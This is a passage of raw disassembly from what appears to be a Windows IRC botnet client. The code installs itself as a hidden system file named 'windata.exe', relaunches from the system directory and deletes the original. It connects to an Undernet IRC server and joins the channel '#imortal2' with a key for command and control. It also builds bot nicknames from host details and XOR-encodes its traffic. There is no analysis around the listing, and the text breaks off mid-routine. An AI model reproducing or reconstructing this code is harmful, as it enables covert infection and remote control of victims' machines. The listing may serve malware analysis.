push offset aIiknc ; "iiKnc"
push ebx
push ebx
call ds:dword_42B058 ; CreateMutexA
push eax
call ds:dword_42B054 ; WaitForSingleObject
cmp eax, 102h
jnz short loc_40A2E2
push 1
jmp loc_40A53C
; ---------------------------------------------------------------------------
loc_40A2E2: ; CODE XREF: sub_40A263+76�j
lea eax, [ebp+var_880]
push eax
push 202h
call ds:dword_444110 ; WSAStartup
cmp eax, ebx
jnz loc_40A7F7
cmp [ebp+var_880], 2
jnz loc_40A7F1
cmp [ebp+var_87F], 2
jnz loc_40A7F1
mov esi, 104h
push esi
lea eax, [ebp+var_3EC]
push eax
call ds:dword_42B010 ; GetSystemDirectoryA
push esi
lea eax, [ebp+var_2E8]
push eax
push ebx
call ds:dword_42B024 ; GetModuleHandleA
push eax
call ds:dword_42B00C ; GetModuleFileNameA
lea eax, [ebp+var_4EC]
push eax
lea eax, [ebp+var_6F0]
push eax
push ebx
lea eax, [ebp+var_2E8]
push ebx
push eax
call sub_41ED01
lea eax, [ebp+var_4EC]
push eax
lea eax, [ebp+var_6F0]
push eax
push offset aSS ; "%s%s"
lea eax, [ebp+var_5F0]
push esi
push eax
call sub_41E6FE
lea eax, [ebp+var_3EC]
push eax
lea eax, [ebp+var_2E8]
push eax
call sub_41F090
add esp, 30h
test eax, eax
jnz loc_40A542
cmp ds:dword_4D1FD4, ebx
mov esi, offset aWindata_exe ; "windata.exe"
jz short loc_40A3D7
push esi
xor edi, edi
call sub_41E1C0
sub eax, 4
pop ecx
jz short loc_40A3D7
loc_40A3B4: ; CODE XREF: sub_40A263+172�j
call sub_41ECDE
push 1Ah
cdq
pop ecx
idiv ecx
push esi
add dl, 61h
mov byte ptr ds:aWindata_exe[edi], dl ; "windata.exe"
inc edi
call sub_41E1C0
sub eax, 4
cmp edi, eax
pop ecx
jb short loc_40A3B4
loc_40A3D7: ; CODE XREF: sub_40A263+141�j
; sub_40A263+14F�j
push esi
lea eax, [ebp+var_3EC]
push eax
lea eax, [ebp+var_1E4]
push offset aSS_0 ; "%s\\%s"
push eax
call sub_41E6A6
add esp, 10h
lea eax, [ebp+var_1E4]
push eax
call ds:dword_42B050 ; GetFileAttributesA
cmp eax, 0FFFFFFFFh
jz short loc_40A417
push 80h
lea eax, [ebp+var_1E4]
push eax
call ds:dword_42B04C ; SetFileAttributesA
loc_40A417: ; CODE XREF: sub_40A263+1A0�j
mov esi, ds:dword_42B048
xor edi, edi
jmp short loc_40A443
; ---------------------------------------------------------------------------
loc_40A421: ; CODE XREF: sub_40A263+1F3�j
call ds:dword_42B01C ; RtlGetLastWin32Error
cmp edi, ebx
jnz short loc_40A458
cmp eax, 20h
jz short loc_40A435
cmp eax, 5
jnz short loc_40A458
loc_40A435: ; CODE XREF: sub_40A263+1CB�j
xor edi, edi
push 3A98h
inc edi
call ds:dword_42B014 ; Sleep
loc_40A443: ; CODE XREF: sub_40A263+1BC�j
push ebx
lea eax, [ebp+var_1E4]
push eax
lea eax, [ebp+var_2E8]
push eax
call esi ; CopyFileA
test eax, eax
jz short loc_40A421
loc_40A458: ; CODE XREF: sub_40A263+1C6�j
; sub_40A263+1D0�j
lea eax, [ebp+var_1E4]
push eax
call sub_41AE17
pop ecx
push 7
lea eax, [ebp+var_1E4]
push eax
call ds:dword_42B04C ; SetFileAttributesA
push 10h
lea eax, [ebp+var_1C]
push ebx
push eax
call sub_41E5F0
push 44h
pop esi
push esi
lea eax, [ebp+var_E0]
push ebx
push eax
call sub_41E5F0
mov [ebp+var_E0], esi
xor esi, esi
inc esi
add esp, 18h
mov [ebp+var_D4], offset byte_42B633
mov [ebp+var_B4], esi
mov [ebp+var_B0], bx
call ds:dword_42B044 ; GetCurrentProcessId
push eax
push esi
push 100000h
call ds:dword_42B040 ; OpenProcess
lea ecx, [ebp+var_2E8]
push ecx
push eax
lea eax, [ebp+var_1E4]
push eax
lea eax, [ebp+var_984]
push offset aSDS ; "%s %d \"%s\""
push eax
call sub_41E6A6
add esp, 14h
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_E0]
push eax
lea eax, [ebp+var_3EC]
push eax
push ebx
push 28h
push esi
push ebx
push ebx
lea eax, [ebp+var_984]
push eax
lea eax, [ebp+var_1E4]
push eax
call ds:dword_42B008 ; CreateProcessA
test eax, eax
jz short loc_40A542
push 0C8h
call ds:dword_42B014 ; Sleep
push [ebp+var_1C]
mov esi, ds:dword_42B004
call esi ; CloseHandle
push [ebp+var_18]
call esi ; CloseHandle
call ds:dword_444224 ; WSACleanup
push ebx
loc_40A53C: ; CODE XREF: sub_40A263+7A�j
call ds:dword_42B000 ; ExitProcess
loc_40A542: ; CODE XREF: sub_40A263+130�j
; sub_40A263+2B5�j
cmp ds:dword_4E2914, 2
jle short loc_40A58E
mov eax, ds:dword_4E2918
push dword ptr [eax+4]
call sub_41E7AD
pop ecx
mov esi, eax
push 0FFFFFFFFh
push esi
call ds:dword_42B054 ; WaitForSingleObject
push esi
call ds:dword_42B004 ; CloseHandle
mov eax, ds:dword_4E2918
cmp [eax+8], ebx
jz short loc_40A58E
push 7D0h
call ds:dword_42B014 ; Sleep
mov eax, ds:dword_4E2918
push dword ptr [eax+8]
call ds:dword_42B02C ; DeleteFileA
loc_40A58E: ; CODE XREF: sub_40A263+2E6�j
; sub_40A263+310�j
cmp ds:dword_43C088, ebx
jz short loc_40A5AB
cmp ds:dword_444274, ebx
jnz short loc_40A5AB
lea eax, [ebp+var_5F0]
push eax
call sub_401000
pop ecx
loc_40A5AB: ; CODE XREF: sub_40A263+331�j
; sub_40A263+339�j
lea eax, [ebp+var_9C]
push offset dword_42FDAC
push eax
call sub_41E6A6
push ebx
lea eax, [ebp+var_9C]
push ebx
push eax
call sub_40AE85
lea eax, [ebp+var_9C]
push eax
call sub_417D70
push 0B80h
push ebx
push offset dword_4D1450
call sub_41E5F0
lea eax, [ebp+var_9C]
push offset unk_42FD88
push eax
call sub_41E6A6
push ebx
lea eax, [ebp+var_9C]
push 1
push eax
call sub_40AE85
mov edi, ds:dword_42B03C
add esp, 38h
mov esi, eax
lea eax, [ebp+var_8]
push eax
push ebx
push ebx
push offset byte_41C76D
push ebx
push ebx
call edi ; CreateThread
imul esi, 234h
cmp eax, ebx
mov ds:dword_4444FC[esi], eax
jnz short loc_40A64B
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_9C]
push offset unk_42FD48
push eax
call sub_41E6A6
add esp, 0Ch
loc_40A64B: ; CODE XREF: sub_40A263+3CB�j
lea eax, [ebp+var_9C]
push eax
call sub_417D70
push 2
call sub_40B075
test eax, eax
pop ecx
pop ecx
jnz short loc_40A6D0
lea eax, [ebp+var_9C]
push offset dword_42FD1C
push eax
call sub_41E6A6
push ebx
lea eax, [ebp+var_9C]
push 2
push eax
call sub_40AE85
add esp, 14h
mov esi, eax
lea eax, [ebp+var_8]
push eax
push ebx
push esi
push offset loc_41321D
push ebx
push ebx
call edi ; CreateThread
imul esi, 234h
cmp eax, ebx
mov ds:dword_4444FC[esi], eax
jnz short loc_40A6C3
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_9C]
push offset dword_42FCE8
push eax
call sub_41E6A6
add esp, 0Ch
loc_40A6C3: ; CODE XREF: sub_40A263+443�j
lea eax, [ebp+var_9C]
push eax
call sub_417D70
pop ecx
loc_40A6D0: ; CODE XREF: sub_40A263+3FF�j
call sub_41ECDE
push 7Fh
and eax, 3
push offset aOslo_no_eu_und ; "oslo.no.eu.undernet.org"
push offset dword_4D12EC
mov ds:dword_4D1FE0, eax
call sub_41E860
mov eax, ds:dword_43C068
push 3Fh
push offset aImortal2 ; "#imortal2"
mov edi, offset dword_4D136C
push edi
mov ds:dword_4D143C, eax
call sub_41E860
push 3Fh
push offset aRelax ; "relax"
mov esi, offset dword_4D13AC
push esi
call sub_41E860
mov ds:dword_4D1440, ebx
loc_40A722: ; CODE XREF: sub_40A263+53A�j
; sub_40A263+584�j
add esp, 24h
loc_40A725: ; CODE XREF: sub_40A263+542�j
mov [ebp+var_4], ebx
loc_40A728: ; CODE XREF: sub_40A263+4FB�j
push offset dword_4D12E8
mov ds:dword_4D1FDC, ebx
call sub_4025EF
cmp eax, 2
jz loc_40A7EC
cmp ds:dword_4D1FDC, ebx
jz short loc_40A74C
dec [ebp+var_4]
loc_40A74C: ; CODE XREF: sub_40A263+4E4�j
push 0BB8h
call ds:dword_42B014 ; Sleep
inc [ebp+var_4]
cmp [ebp+var_4], 6
jl short loc_40A728
cmp [ebp+var_C], ebx
jz short loc_40A79F
push 7Fh
push offset aOslo_no_eu_und ; "oslo.no.eu.undernet.org"
push offset dword_4D12EC
call sub_41E860
mov eax, ds:dword_43C068
push 3Fh
push offset aImortal2 ; "#imortal2"
push edi
mov ds:dword_4D143C, eax
call sub_41E860
push 3Fh
push offset aRelax ; "relax"
push esi
call sub_41E860
mov [ebp+var_C], ebx
jmp short loc_40A722
; ---------------------------------------------------------------------------
loc_40A79F: ; CODE XREF: sub_40A263+500�j
cmp ds:byte_43C0DC, bl
jz loc_40A725
push 7Fh
push offset byte_43C0DC
push offset dword_4D12EC
call sub_41E860
mov eax, ds:dword_43C06C
push 3Fh
push offset aImortal2_3 ; "#imortal2"
push edi
mov ds:dword_4D143C, eax
call sub_41E860
push 3Fh
push offset aRelax_1 ; "relax"
push esi
call sub_41E860
mov [ebp+var_C], 1
jmp loc_40A722
; ---------------------------------------------------------------------------
loc_40A7EC: ; CODE XREF: sub_40A263+4D8�j
call sub_40AFF6
loc_40A7F1: ; CODE XREF: sub_40A263+A0�j
; sub_40A263+AD�j
call ds:dword_444224 ; WSACleanup
loc_40A7F7: ; CODE XREF: sub_40A263+93�j
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 10h
sub_40A263 endp
; =============== S U B R O U T I N E =======================================
sub_40A800 proc near ; CODE XREF: sub_40AB83+4A�p
; DATA XREF: seg002:off_43C4B8�o
arg_0 = dword ptr 4
push esi
push edi
call ds:dword_42B038 ; GetTickCount
push eax
call sub_41ECD4
call sub_41ECDE
xor edx, edx
mov ecx, 48Fh
div ecx
mov edi, [esp+0Ch+arg_0]
push ds:off_43C520[edx*4]
push offset aS ; "%s"
push 1Ch
push edi
call sub_41E6FE
xor esi, esi
add esp, 14h
cmp ds:dword_43C090, esi
jle short loc_40A867
loc_40A841: ; CODE XREF: sub_40A800+65�j
call sub_41ECDE
push 0Ah
pop ecx
cdq
idiv ecx
push edx
push edi
push offset aSI ; "%s%i"
push 1Ch
push edi
call sub_41E6FE
add esp, 14h
inc esi
cmp esi, ds:dword_43C090
jl short loc_40A841
loc_40A867: ; CODE XREF: sub_40A800+3F�j
mov eax, edi
pop edi
pop esi
retn
sub_40A800 endp
; ---------------------------------------------------------------------------
dword_40A86C dd 15FF5756h, 42B038h, 445AE850h, 7C8B0001h, 4C71024h
dd 43C12C24h, 0B6406800h, 1C6A0042h, 3E6CE857h, 0F6330001h
dd 3910C483h, 43C09035h, 0E8267E00h, 1443Ah, 99590A6Ah
dd 5752F9F7h, 42E72468h, 571C6A00h, 13E45E8h, 14C48300h
dd 90353B46h, 7C0043C0h, 5FC78BDAh
db 5Eh, 0C3h
; =============== S U B R O U T I N E =======================================
sub_40A8CA proc near ; CODE XREF: sub_40274D+66B8�p
arg_0 = dword ptr 4
push ebx
push esi
push edi
call ds:dword_42B038 ; GetTickCount
push eax
call sub_41ECD4
pop ecx
call sub_41ECDE
push 3
cdq
pop ecx
idiv ecx
mov ebx, [esp+0Ch+arg_0]
xor edi, edi
mov esi, edx
add esi, ds:dword_43C090
test esi, esi
jle short loc_40A90D
loc_40A8F7: ; CODE XREF: sub_40A8CA+41�j
call sub_41ECDE
push 1Ah
cdq
pop ecx
idiv ecx
add dl, 61h
mov [edi+ebx], dl
inc edi
cmp edi, esi
jl short loc_40A8F7
loc_40A90D: ; CODE XREF: sub_40A8CA+2B�j
mov byte ptr [edi+ebx], 0
pop edi
pop esi
mov eax, ebx
pop ebx
retn
sub_40A8CA endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push esi
push edi
mov dword ptr [ebp-4], 100h
call ds:dword_42B038 ; GetTickCount
push eax
call sub_41ECD4
pop ecx
lea eax, [ebp-4]
push eax
mov esi, offset aPc ; "PC"
push esi
call ds:dword_42B05C ; GetComputerNameA
mov edi, [ebp+8]
push esi
push 1Ch
push edi
call sub_41E6FE
xor esi, esi
add esp, 0Ch
cmp ds:dword_43C090, esi
jle short loc_40A980
loc_40A95A: ; CODE XREF: seg000:0040A97E�j
call sub_41ECDE
push 0Ah
pop ecx
cdq
idiv ecx
push edx
push edi
push offset aSI ; "%s%i"
push 1Ch
push edi
call sub_41E6FE
add esp, 14h
inc esi
cmp esi, ds:dword_43C090
jl short loc_40A95A
loc_40A980: ; CODE XREF: seg000:0040A958�j
mov eax, edi
pop edi
pop esi
leave
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
push edi
call ds:dword_42B038 ; GetTickCount
push eax
call sub_41ECD4
pop ecx
push 0Ah
lea eax, [ebp-0Ch]
push eax
push 7
push 800h
call ds:dword_42B060 ; GetLocaleInfoA
mov edi, [ebp+8]
lea eax, [ebp-0Ch]
push eax
push offset aS_6 ; "%s|"
push 1Ch
push edi
call sub_41E6FE
xor esi, esi
add esp, 10h
cmp ds:dword_43C090, esi
jle short loc_40A9F5
loc_40A9CF: ; CODE XREF: seg000:0040A9F3�j
call sub_41ECDE
push 0Ah
pop ecx
cdq
idiv ecx
push edx
push edi
push offset aSI ; "%s%i"
push 1Ch
push edi
call sub_41E6FE
add esp, 14h
inc esi
cmp esi, ds:dword_43C090
jl short loc_40A9CF
loc_40A9F5: ; CODE XREF: seg000:0040A9CD�j
mov eax, edi
pop edi
pop esi
leave
retn
; ---------------------------------------------------------------------------
aUnlMbF db 'Ul$Œì”',0
dd 57560000h, 50E0458Dh, 42B633BEh, 0E045C700h, 94h, 0B06415FFh
dd 15FF0042h, 42B038h, 42AAE850h, 7D830001h, 755904E4h
dd 0E87D8338h, 83187500h, 7501F07Dh, 282CBE05h, 7D830043h
dd 517502F0h, 432828BEh, 834AEB00h, 750AE87Dh, 2824BE07h
dd 3DEB0043h, 5AE87D83h, 20BE3275h, 0EB004328h, 0E47D8330h
dd 83257505h, 7500E87Dh, 281CBE07h, 1DEB0043h, 1E87D83h
dd 18BE0775h, 0EB004328h, 0E87D8310h, 2814BE02h, 5740043h
dd 432810BEh, 7C7D8B00h, 28086856h, 1C6A0043h, 3C54E857h
dd 0F6330001h, 3910C483h, 43C09035h, 0E8267E00h, 14222h
dd 99590A6Ah, 5752F9F7h, 42E72468h, 571C6A00h, 13C2DE8h
dd 14C48300h, 90353B46h, 7C0043C0h, 5FC78BDAh, 74C5835Eh
db 0C9h, 0C3h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40AAE6 proc near ; CODE XREF: sub_40AB83+5D�p
var_1C = byte ptr -1Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1Ch
push esi
call ds:dword_42B038 ; GetTickCount
xor edx, edx
mov ecx, 5265C00h
div ecx
push 0
push offset aMirc_0 ; "mIRC"
mov esi, eax
call ds:dword_444160 ; FindWindowA
cmp esi, 64h
jbe short loc_40AB35
test eax, eax
mov eax, offset aM ; "[M]"
jnz short loc_40AB1E
mov eax, offset byte_42B633
loc_40AB1E: ; CODE XREF: sub_40AAE6+31�j
push eax
push esi
push offset aDS ; "[%d]%s"
lea eax, [ebp+var_1C]
push 1Ch
push eax
call sub_41E6FE
add esp, 14h
jmp short loc_40AB4F
; ---------------------------------------------------------------------------
loc_40AB35: ; CODE XREF: sub_40AAE6+28�j
test eax, eax
mov eax, offset aM ; "[M]"
jnz short loc_40AB43
mov eax, offset byte_42B633
loc_40AB43: ; CODE XREF: sub_40AAE6+56�j
push eax
lea eax, [ebp+var_1C]
push eax
call sub_41E6A6
pop ecx
pop ecx
loc_40AB4F: ; CODE XREF: sub_40AAE6+4D�j
lea eax, [ebp+var_1C]
push eax
call sub_41E1C0
cmp eax, 2
pop ecx
pop esi
jbe short loc_40AB7E
push 1Ch
push [ebp+arg_0]
lea eax, [ebp+var_1C]
push eax
call sub_41F2C0
push 1Ch
lea eax, [ebp+var_1C]
push eax
push [ebp+arg_0]
call sub_41E860
add esp, 18h
loc_40AB7E: ; CODE XREF: sub_40AAE6+77�j
mov eax, [ebp+arg_0]
leave
retn
sub_40AAE6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40AB83 proc near ; CODE XREF: sub_402472+52�p
; sub_4025EF+4B�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push esi
push edi
xor edi, edi
xor esi, esi
loc_40AB8C: ; CODE XREF: sub_40AB83+40�j
cmp [ebp+arg_C], 0
jz short loc_40ABAA
lea eax, dword_43C4A8[esi]
push eax
push [ebp+arg_C]
call sub_41E990
neg eax
pop ecx
sbb eax, eax
pop ecx
inc eax
jmp short loc_40ABB8
; ---------------------------------------------------------------------------
loc_40ABAA: ; CODE XREF: sub_40AB83+D�j
mov ecx, ds:dword_43C4B4[esi]
xor eax, eax
cmp ecx, [ebp+arg_4]
setz al
loc_40ABB8: ; CODE XREF: sub_40AB83+25�j
test eax, eax
jnz short loc_40ABC7
add esi, 14h
inc edi
cmp esi, 78h
jb short loc_40AB8C
jmp short loc_40ABD5
; ---------------------------------------------------------------------------
loc_40ABC7: ; CODE XREF: sub_40AB83+37�j
push [ebp+arg_0]
lea eax, [edi+edi*4]
call ds:off_43C4B8[eax*4]
pop ecx
loc_40ABD5: ; CODE XREF: sub_40AB83+42�j
cmp [ebp+arg_8], 0
pop edi
pop esi
jz short loc_40ABE8
push [ebp+arg_0]
call sub_40AAE6
pop ecx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_40ABE8: ; CODE XREF: sub_40AB83+58�j
mov eax, [ebp+arg_0]
pop ebp
retn
sub_40AB83 endp
; =============== S U B R O U T I N E =======================================
sub_40ABED proc near ; CODE XREF: sub_40AC0D+A�p
; sub_40AE01+8�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push [esp+4+arg_0]
call sub_41E1C0
push [esp+8+arg_4]
mov esi, eax
call sub_41E1C0
pop ecx
pop ecx
lea eax, [esi+eax*2+0C1h]
pop esi
retn
sub_40ABED endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40AC0D proc near ; CODE XREF: sub_40AE18+49�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push [ebp+arg_C]
push [ebp+arg_8]
call sub_40ABED
cmp eax, [ebp+arg_4]
pop ecx
pop ecx
mov [ebp+var_4], eax
jbe short loc_40AC2A
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_40AC2A: ; CODE XREF: sub_40AC0D+17�j
push ebx
push esi
push edi
push [ebp+arg_8]
call sub_41E1C0
push [ebp+arg_C]
mov esi, eax
call sub_41E1C0
mov ebx, [ebp+arg_0]
mov edi, eax
lea eax, [edi+esi+12h]
mov ds:dword_43D7F4, eax
lea eax, [edi+1]
mov ds:dword_43D815, eax
push 0FFFFFFEDh
lea eax, [edi+17h]
mov ds:dword_43D80D, eax
pop eax
push 74h
sub eax, edi
push offset dword_43D790
push ebx
mov ds:dword_43D823, eax
call sub_41F400
push esi
push [ebp+arg_8]
lea eax, [ebx+74h]
push eax
call sub_41F400
push 5
add esi, 74h
lea eax, [esi+ebx]
push offset aGet ; " get "
push eax
call sub_41F400
push edi
push [ebp+arg_C]
add esi, 5
lea eax, [esi+ebx]
push eax
call sub_41F400
push 10h
add esi, edi
lea eax, [esi+ebx]
push 43D809h
push eax
call sub_41F400
add esp, 44h
push edi
push [ebp+arg_C]
add esi, 10h
lea eax, [esi+ebx]
push eax
call sub_41F400
push 38h
add esi, edi
push offset byte_43D819
add esi, ebx
push esi
call sub_41F400
mov eax, [ebp+var_4]
add esp, 18h
pop edi
pop esi
pop ebx
leave
retn
sub_40AC0D endp
; =============== S U B R O U T I N E =======================================
sub_40ACE5 proc near ; CODE XREF: sub_40AD00+47�p
; sub_40AE01+E�p
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
test cl, cl
jnz short loc_40ACEE
inc ecx
loc_40ACEE: ; CODE XREF: sub_40ACE5+6�j
mov eax, 0FFh
cmp eax, ecx
sbb eax, eax
and eax, 2
add eax, 15h
add eax, ecx
retn
sub_40ACE5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40AD00 proc near ; CODE XREF: sub_40AE18+56�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
mov edx, [ebp+arg_C]
cmp dl, 0Ah
jz short loc_40AD1A
cmp dl, 0Dh
jz short loc_40AD1A
cmp dl, 5Ch
jz short loc_40AD1A
test dl, dl
jnz short loc_40AD1E
loc_40AD1A: ; CODE XREF: sub_40AD00+A�j
; sub_40AD00+F�j ...
inc edx
mov [ebp+arg_C], edx
loc_40AD1E: ; CODE XREF: sub_40AD00+18�j
push esi
mov esi, 0FFh
cmp edx, esi
jbe short loc_40AD46
mov eax, edx
shr eax, 8
cmp al, 0Ah
jz short loc_40AD3D
cmp al, 0Dh
jz short loc_40AD3D
cmp al, 5Ch
jz short loc_40AD3D
test al, al
jnz short loc_40AD46
loc_40AD3D: ; CODE XREF: sub_40AD00+2F�j
; sub_40AD00+33�j ...
add edx, 100h
mov [ebp+arg_C], edx
loc_40AD46: ; CODE XREF: sub_40AD00+26�j
; sub_40AD00+3B�j
push edx
call sub_40ACE5
cmp eax, [ebp+arg_4]
pop ecx
mov [ebp+var_4], eax
ja short loc_40AD5C
cmp eax, 0FFFFh
jbe short loc_40AD63
loc_40AD5C: ; CODE XREF: sub_40AD00+53�j
xor eax, eax
jmp loc_40ADFE
; ---------------------------------------------------------------------------
loc_40AD63: ; CODE XREF: sub_40AD00+5A�j
push ebx
mov bl, ds:byte_4D1FE8
xor ecx, ecx
test edx, edx
push edi
mov edi, [ebp+arg_8]
jbe short loc_40AD90
loc_40AD74: ; CODE XREF: sub_40AD00+8E�j
mov al, [ecx+edi]
xor al, bl
jz short loc_40AD87
cmp al, 0Ah
jz short loc_40AD87
cmp al, 0Dh
jz short loc_40AD87
cmp al, 5Ch
jnz short loc_40AD8B
loc_40AD87: ; CODE XREF: sub_40AD00+79�j
; sub_40AD00+7D�j ...
inc bl
xor ecx, ecx
loc_40AD8B: ; CODE XREF: sub_40AD00+85�j
inc ecx
cmp ecx, edx
jb short loc_40AD74
loc_40AD90: ; CODE XREF: sub_40AD00+72�j
cmp edx, esi
mov ds:byte_4D1FE8, bl
ja short loc_40ADBC
push 15h
push offset dword_43D778
push [ebp+arg_0]
mov ds:byte_43D785, dl
mov ds:byte_43D789, bl
call sub_41F400
add esp, 0Ch
push 15h
jmp short loc_40ADDD
; ---------------------------------------------------------------------------
loc_40ADBC: ; CODE XREF: sub_40AD00+98�j
push 17h
push offset dword_43D760
push [ebp+arg_0]
mov ds:word_43D76E, dx
mov ds:byte_43D773, bl
call sub_41F400
add esp, 0Ch
push 17h
loc_40ADDD: ; CODE XREF: sub_40AD00+BA�j
xor eax, eax
cmp [ebp+arg_C], eax
pop ecx
jbe short loc_40ADF9
mov edx, [ebp+arg_0]
lea esi, [ecx+edx]
loc_40ADEB: ; CODE XREF: sub_40AD00+F7�j
mov cl, [eax+edi]
xor cl, bl
mov [esi+eax], cl
inc eax
cmp eax, [ebp+arg_C]
jb short loc_40ADEB
loc_40ADF9: ; CODE XREF: sub_40AD00+E3�j
mov eax, [ebp+var_4]
pop edi
pop ebx
loc_40ADFE: ; CODE XREF: sub_40AD00+5E�j
pop esi
leave
retn
sub_40AD00 endp
; =============== S U B R O U T I N E =======================================
sub_40AE01 proc near ; CODE XREF: sub_40AE18+D�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push [esp+arg_4]
push [esp+4+arg_0]
call sub_40ABED
push eax
call sub_40ACE5
add esp, 0Ch
retn
sub_40AE01 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40AE18 proc near ; CODE XREF: seg000:00410AB1�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ebx
mov ebx, [ebp+arg_8]
push edi
mov edi, [ebp+arg_C]
push edi
push ebx
call sub_40AE01
cmp eax, [ebp+arg_4]
pop ecx
pop ecx
ja short loc_40AE38
cmp eax, 0FFFFh
jbe short loc_40AE3C
loc_40AE38: ; CODE XREF: sub_40AE18+17�j
xor eax, eax
jmp short loc_40AE81
; ---------------------------------------------------------------------------
loc_40AE3C: ; CODE XREF: sub_40AE18+1E�j
push esi
push edi
push ebx
call sub_40ABED
add eax, 101h
push eax
call sub_41E5D3
add esp, 0Ch
push edi
push ebx
push edi
push ebx
mov esi, eax
call sub_40ABED
pop ecx
pop ecx
push eax
push esi
call sub_40AC0D
push eax
push esi
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40AD00
push esi
mov edi, eax
call sub_41E2A1
add esp, 24h
mov eax, edi
pop esi
loc_40AE81: ; CODE XREF: sub_40AE18+22�j
pop edi
pop ebx
pop ebp
retn
sub_40AE18 endp
; =============== S U B R O U T I N E =======================================
sub_40AE85 proc near ; CODE XREF: sub_40274D+6E4�p
; sub_40274D+91A�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push edi
xor edi, edi
mov eax, offset dword_4442E8
loc_40AE8D: ; CODE XREF: sub_40AE85+18�j
cmp byte ptr [eax], 0
jz short loc_40AEA1
add eax, 234h
inc edi
cmp eax, offset dword_4D12E8
jl short loc_40AE8D
jmp short loc_40AEEC
; ---------------------------------------------------------------------------
loc_40AEA1: ; CODE XREF: sub_40AE85+B�j
push esi
mov esi, edi
imul esi, 234h
push 1FFh
push [esp+0Ch+arg_0]
lea eax, dword_4442E8[esi]
push eax
call sub_41E860
mov eax, [esp+14h+arg_4]
and ds:dword_4444EC[esi], 0
mov ds:dword_4444E8[esi], eax
mov eax, [esp+14h+arg_8]
add esp, 0Ch
and ds:dword_4444F0[esi], 0
mov ds:dword_4444F4[esi], eax
mov ds:byte_444500[esi], 0
pop esi
loc_40AEEC: ; CODE XREF: sub_40AE85+1A�j
mov eax, edi
pop edi
retn
sub_40AE85 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 200h
push esi
push edi
push 0
push dword ptr [ebp+10h]
push offset dword_432844
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call sub_40123B
add esp, 14h
xor edi, edi
mov esi, offset dword_4442E8
loc_40AF1A: ; CODE XREF: seg000:0040AF68�j
cmp byte ptr [esi], 0
jz short loc_40AF5B
cmp dword ptr [ebp+14h], 0
jnz short loc_40AF2E
cmp dword ptr [esi+204h], 0
jnz short loc_40AF5B
loc_40AF2E: ; CODE XREF: seg000:0040AF23�j
push esi
push edi
lea eax, [ebp-200h]
push offset aD_S ; "%d. %s"
push eax
call sub_41E6A6
push 1
push dword ptr [ebp+10h]
lea eax, [ebp-200h]
push eax
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call sub_40123B
add esp, 24h
loc_40AF5B: ; CODE XREF: seg000:0040AF1D�j
; seg000:0040AF2C�j
add esi, 234h
inc edi
cmp esi, offset dword_4D12E8
jl short loc_40AF1A
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
sub_40AF6E proc near ; CODE XREF: sub_40274D+779B�p
; sub_40AFF6+12�p ...
arg_0 = dword ptr 4
push ebx
push ebp
push esi
mov esi, [esp+0Ch+arg_0]
xor ebx, ebx
xor ebp, ebp
cmp esi, ebx
jle short loc_40AFF0
cmp esi, 400h
jge short loc_40AFF0
imul esi, 234h
push edi
push ebx
lea edi, dword_4444FC[esi]
push dword ptr [edi]
call ds:dword_42B028 ; TerminateThread
cmp [edi], ebx
jz short loc_40AFA0
inc ebp
loc_40AFA0: ; CODE XREF: sub_40AF6E+2F�j
mov [edi], ebx
lea edi, dword_4444F0[esi]
mov eax, [edi]
cmp eax, ebx
mov ds:dword_4444E8[esi], ebx
mov ds:dword_4444EC[esi], ebx
jbe short loc_40AFC1
push eax
call sub_41C736
pop ecx
loc_40AFC1: ; CODE XREF: sub_40AF6E+4A�j
mov [edi], ebx
lea edi, dword_4444F4[esi]
push dword ptr [edi]
mov byte ptr ds:dword_4442E8[esi], bl
mov ds:byte_444500[esi], bl
call ds:dword_444218 ; closesocket
lea esi, dword_4444F8[esi]
push dword ptr [esi]
mov [edi], ebx
call ds:dword_444218 ; closesocket
mov [esi], ebx
pop edi
loc_40AFF0: ; CODE XREF: sub_40AF6E+D�j
; sub_40AF6E+15�j
pop esi
mov eax, ebp
pop ebp
pop ebx
retn
sub_40AF6E endp
; =============== S U B R O U T I N E =======================================
sub_40AFF6 proc near ; CODE XREF: seg000:00401127�p
; sub_40274D+2D10�p ...
push ebx
push esi
push edi
xor ebx, ebx
xor edi, edi
mov esi, offset dword_4442E8
loc_40B002: ; CODE XREF: sub_40AFF6+2A�j
cmp byte ptr [esi], 0
jz short loc_40B013
push edi
call sub_40AF6E
test eax, eax
pop ecx
jz short loc_40B013
inc ebx
loc_40B013: ; CODE XREF: sub_40AFF6+F�j
